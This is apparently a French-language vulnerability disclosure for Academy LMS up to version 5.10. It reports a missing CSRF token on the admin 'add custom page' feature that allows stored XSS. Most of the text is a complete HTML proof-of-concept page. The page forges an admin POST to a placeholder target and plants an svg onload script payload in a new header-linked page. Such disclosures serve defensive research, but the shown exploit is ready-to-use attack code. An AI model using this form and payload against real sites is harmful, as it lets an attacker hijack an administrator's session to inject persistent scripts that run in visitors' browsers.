
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS est une application permettant aux utilisateurs de créer et de promouvoir des cours. La fonctionnalité d'ajout d'une nouvelle page est vulnérable au CSRF car aucun token n'évite cette attaque. De plus, cette page peut être utilisée pour charger une charge utile XSS stockée.
La première étape de notre preuve de concept consiste à s'authentifier sur la plateforme avec un utilisateur administrateur.
Ensuite, il suffit d'accéder à la page contenant le code d'exploitation de la vulnérabilité. Un nouveau bouton apparaît sur la page d'accueil du site, redirigeant vers une page xss.
Code utilisé dans l'exploit :
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>